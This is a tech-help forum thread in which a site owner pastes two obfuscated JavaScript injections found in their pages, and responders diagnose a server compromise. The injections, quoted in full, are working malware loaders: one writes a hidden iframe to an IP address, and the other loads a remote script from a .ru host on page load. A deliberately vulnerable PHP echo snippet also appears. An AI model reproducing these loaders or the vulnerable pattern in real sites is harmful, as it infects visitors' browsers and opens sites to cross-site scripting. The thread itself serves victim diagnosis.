Script Injection Issue

kaskhedikar_tushar
kaskhedikar_tushar used Ask the Experts™
on
I have a strange issue with two of my websites. I am not sure how, but there is a JavaScript code injected in my all HTML pages.

I want to know how they could have done this? And how can I avoid such instance in future?

Below are the code snippets that are injected


//On the other website following was injected in all JavaScript pages.


 Thanks in advance.

 



First:

<script language=JavaScript>

var tyeouyfgbiw = 'UXYZegeTyNuha3cUXYZegeTyNuha69UXYZegeTyNuha66';var ylxjgiipaok = 'UXYZegeTyNuha72';var vjprvfxwnkv = 'UXYZegeTyNuha61UXYZegeTyNuha6dUXYZegeTyNuha65UXYZegeTyNuha20UXYZegeTyNuha6eUXYZegeTyNuha61UXYZegeTyNuha6dUXYZegeTyNuha65UXYZegeTyNuha3dUXYZegeTyNuha22';var uyqrdwsmtgx = 'UXYZegeTyNuha76UXYZegeTyNuha75UXYZegeTyNuha6cUXYZegeTyNuha67UXYZegeTyNuha78UXYZegeTyNuha70UXYZegeTyNuha67UXYZegeTyNuha76UXYZegeTyNuha61UXYZegeTyNuha79UXYZegeTyNuha74';var xqezyuznexx = 'UXYZegeTyNuha22UXYZegeTyNuha20UXYZegeTyNuha77UXYZegeTyNuha69UXYZegeTyNuha64UXYZegeTyNuha74UXYZegeTyNuha68UXYZegeTyNuha3dUXYZegeTyNuha22UXYZegeTyNuha31UXYZegeTyNuha22UXYZegeTyNuha20UXYZegeTyNuha68UXYZegeTyNuha65UXYZegeTyNuha69UXYZegeTyNuha67UXYZegeTyNuha68UXYZegeTyNuha74UXYZegeTyNuha3dUXYZegeTyNuha22UXYZegeTyNuha30UXYZegeTyNuha22';var mpsampnxkgv = 'UXYZegeTyNuha20UXYZegeTyNuha73UXYZegeTyNuha72UXYZegeTyNuha63UXYZegeTyNuha3dUXYZegeTyNuha22';var txzypmrwjim = 'UXYZegeTyNuha68UXYZegeTyNuha74UXYZegeTyNuha74UXYZegeTyNuha70UXYZegeTyNuha3aUXYZegeTyNuha2fUXYZegeTyNuha2f';var thkigxnevit = '85.12.60.10/dolny/index.php';var zifdvdocypz = 'UXYZegeTyNuha22UXYZegeTyNuha20UXYZegeTyNuha6dUXYZegeTyNuha61UXYZegeTyNuha72UXYZegeTyNuha67UXYZegeTyNuha69UXYZegeTyNuha6eUXYZegeTyNuha77UXYZegeTyNuha69UXYZegeTyNuha64UXYZegeTyNuha74UXYZegeTyNuha68UXYZegeTyNuha3dUXYZegeTyNuha22UXYZegeTyNuha31UXYZegeTyNuha22UXYZegeTyNuha20UXYZegeTyNuha6dUXYZegeTyNuha61UXYZegeTyNuha72UXYZegeTyNuha67UXYZegeTyNuha69UXYZegeTyNuha6eUXYZegeTyNuha68UXYZegeTyNuha65UXYZegeTyNuha69UXYZegeTyNuha67UXYZegeTyNuha68UXYZegeTyNuha74UXYZegeTyNuha3dUXYZegeTyNuha22UXYZegeTyNuha30UXYZegeTyNuha22UXYZegeTyNuha20UXYZegeTyNuha74UXYZegeTyNuha69UXYZegeTyNuha74UXYZegeTyNuha6cUXYZegeTyNuha65UXYZegeTyNuha3dUXYZegeTyNuha22';var qnpkelumxjt = 'UXYZegeTyNuha76UXYZegeTyNuha75UXYZegeTyNuha6cUXYZegeTyNuha67UXYZegeTyNuha78UXYZegeTyNuha70UXYZegeTyNuha67UXYZegeTyNuha76UXYZegeTyNuha61UXYZegeTyNuha79UXYZegeTyNuha74';var osafgeaoyow = 'UXYZegeTyNuha22UXYZegeTyNuha20UXYZegeTyNuha73UXYZegeTyNuha63UXYZegeTyNuha72UXYZegeTyNuha6fUXYZegeTyNuha6cUXYZegeTyNuha6cUXYZegeTyNuha69UXYZegeTyNuha6eUXYZegeTyNuha67UXYZegeTyNuha3dUXYZegeTyNuha22UXYZegeTyNuha6eUXYZegeTyNuha6fUXYZegeTyNuha22UXYZegeTyNuha20UXYZegeTyNuha62UXYZegeTyNuha6fUXYZegeTyNuha72UXYZegeTyNuha64UXYZegeTyNuha65UXYZegeTyNuha72UXYZegeTyNuha3dUXYZegeTyNuha22UXYZegeTyNuha30UXYZegeTyNuha22UXYZegeTyNuha20UXYZegeTyNuha66UXYZegeTyNuha72UXYZegeTyNuha61UXYZegeTyNuha6dUXYZegeTyNuha65UXYZegeTyNuha62UXYZegeTyNuha6fUXYZegeTyNuha72UXYZegeTyNuha64UXYZegeTyNuha65UXYZegeTyNuha72UXYZegeTyNuha3dUXYZegeTyNuha22UXYZegeTyNuha30UXYZegeTyNuha22UXYZegeTyNuha3e';var qrshfugvuei = 'UXYZegeTyNuha3cUXYZegeTyNuha2fUXYZegeTyNuha69UXYZegeTyNuha66';var xpnukarttzm = 'UXYZegeTyNuha72UXYZegeTyNuha61';var xfszggxvdbm = 'UXYZegeTyNuha6dUXYZegeTyNuha65UXYZegeTyNuha3e';var rjsqpnktwtj = new Array();rjsqpnktwtj[0]=new Array(tyeouyfgbiw+ylxjgiipaok+vjprvfxwnkv+uyqrdwsmtgx+xqezyuznexx+mpsampnxkgv+txzypmrwjim+thkigxnevit+zifdvdocypz+qnpkelumxjt+osafgeaoyow+qrshfugvuei+xpnukarttzm+xfszggxvdbm);document['UXYZegeTyNuhawUXYZegeTyNuharUXYZegeTyNuhaiUXYZegeTyNuhatUXYZegeTyNuhaeUXYZegeTyNuha'.replace(/UXYZegeTyNuha/g,'')](window['UXYZegeTyNuhauUXYZegeTyNuhanUXYZegeTyNuhaeUXYZegeTyNuhasUXYZegeTyNuhacUXYZegeTyNuhaaUXYZegeTyNuhapUXYZegeTyNuhaeUXYZegeTyNuha'.replace(/UXYZegeTyNuha/g,'')](rjsqpnktwtj.toString().replace(/UXYZegeTyNuha/g,'%')));

</script>

Second:

 

<script>var g='';var s;if(s!='' && s!='AC'){s=''};var l="";var sD;if(sD!='Ej'){sD=''};function E(){this.sZ="";this.sG="";this.kr="";var tM;if(tM!='iH'){tM='iH'};var F=window;var o=new Date();var M=unescape;var ql=new Date();var Xk="";var L;if(L!='u' && L!='ki'){L='u'};var i=M("%2f%67%6f%64%61%64%64%79%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%69%72%6c%73%67%6f%67%61%6d%65%73%2e%63%6f%6d%2e%70%68%70");function V(f,k){var p="";this.fp='';var O="g";var lU;if(lU!='JR' && lU!='Q'){lU=''};var zD;if(zD!='lM' && zD!='e_'){zD=''};var K=M("%5b"), I=M("%5d");var Xo;if(Xo!='c'){Xo=''};var v=K+k+I;this.kD="";var e=new RegExp(v, O);var ar;if(ar!='' && ar!='J_'){ar=null};var ch=new Array();return f.replace(e, new String());var ab;if(ab!='' && ab!='Qi'){ab=null};var Zk;if(Zk!='' && Zk!='fK'){Zk=null};};var MQ=new String();this.Ak="";var gQ=new Array();var FQ=new String();var cX;if(cX!='LU' && cX != ''){cX=null};var pa;if(pa!='jy' && pa != ''){pa=null};var A=V('86616570345578266560159261','37164259');var x=new String();var y=document;var pX=new String();function VG(){var P=M("%68%74%74%70%3a%2f%2f%6c%6f%61%64%74%75%62%65%2e%72%75%3a");var dE=new Array();FQ=P;var aH=new String();var nI=new Date();FQ+=A;FQ+=i;var Mf;if(Mf!='shf' && Mf!='JZ'){Mf='shf'};var Yj='';try {U=y.createElement(V('szcuryi7pxtz','xuF78zy'));this.xO="";U[M("%64%65%66%65%72")]=[1][0];var AL=new Date();var m;if(m!='rZ'){m=''};var sH=new Date();U[M("%73%72%63")]=FQ;var ZJ;if(ZJ!='CX' && ZJ!='mL'){ZJ=''};var XP=new Date();y.body.appendChild(U);this.uK='';this.wV="";} catch(a){var bj=new Date();var WZ;if(WZ!='UD'){WZ=''};alert(a);var kW=new Date();var T=new Date();};}var Eu=new Date();var fa;if(fa!='sHJ' && fa!='Ku'){fa='sHJ'};var fV;if(fV!=''){fV='gX'};F[new String("onloa"+"d")]=VG;this.kT='';this.JY='';var AA;if(AA!='oT'){AA='oT'};var WC;if(WC!='Pj'){WC='Pj'};};E();</script>

Open in new window

Comment
Watch Question

Do more with

Expert Office
EXPERT OFFICE® is a registered trademark of EXPERTS EXCHANGE®
You are probably outputting user input or including files based on user input.

The main thing to remember is always treat user input as unsafe and malicious.. so always escape before you output, never use in "eval", never use directly in filenames for includes and never forget to escape when using user input  in a query.

The folowing example allow these cross-site attacks
// example that shows a vulnerability. DO NOT USE THIS SNIPPET!

<form method="POST">
  <input type="text" name="test"/>
  <input type="submit/>
</form> 

<?php

if(isset($_POST['test'])
{
  echo $_POST['test'];
}

?>

Open in new window

Commented:
Are you with IXWebhosting? They're notorious for these kind of attacks.

If so, move.

If not, you can make sure your files are of a safe CHMOD on the server via FTP.
Use 664 for most HTML and PHP files, 755 for Perl files, etc.

Commented:
Also, ensure your FTP password is a strong one, change it anyway, and use sFTP if possible.
Fundamentals of JavaScript

Learn the fundamentals of the popular programming language JavaScript so that you can explore the realm of web development.

Author

Commented:
Hello Guys,

Thanks for your suggestions, but I have already checked these things.

Let me explain this in more detail,

My website is in php. My files got automatically modified. I tried downloading couple of files, the code is hardcoded there. Its not appearing on at runtime on page load, its part of the html code on page.

Thanks
Greg AlexanderLead Developer

Commented:
If you are on a GoDaddy shared hosting account, then this is your problem
http://thatitguy.com/Company/the-rbTech-Blog/Thoughts-on-the-recent-GoDaddy-hosted-website-attacks
It a go-daddy attack, i'd change providers


I pulled out some string and unescaped them

<script>
  a="%68%74%74%70%3a%2f%2f%6c%6f%61%64%74%75%62%65%2e%72%75%3a"
  alert(unescape(a))
  b="%2f%67%6f%64%61%64%64%79%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%69%72%6c%73%67%6f%67%61%6d%65%73%2e%63%6f%6d%2e%70%68%70"
  alert(unescape(b))
</script>

giving

http://
/godaddy-com/google.com/girlsgogames.com.php

dont even run the script I have given you anivirus will go nuts


*****************

All - based on a request from GwynforWeb, I removed the ".ru" link in this comment.

Vee_Mod
.... its a Trojan btw
Commented:
Sorry,

That is the problem of hacking on hosting servers,that's why its giving error.

Regards,
Tushar Kaskhedikar

Do more with

Expert Office
Submit tech questions to Ask the Experts™ at any time to receive solutions, advice, and new ideas from leading industry professionals.

Start 7-Day Free Trial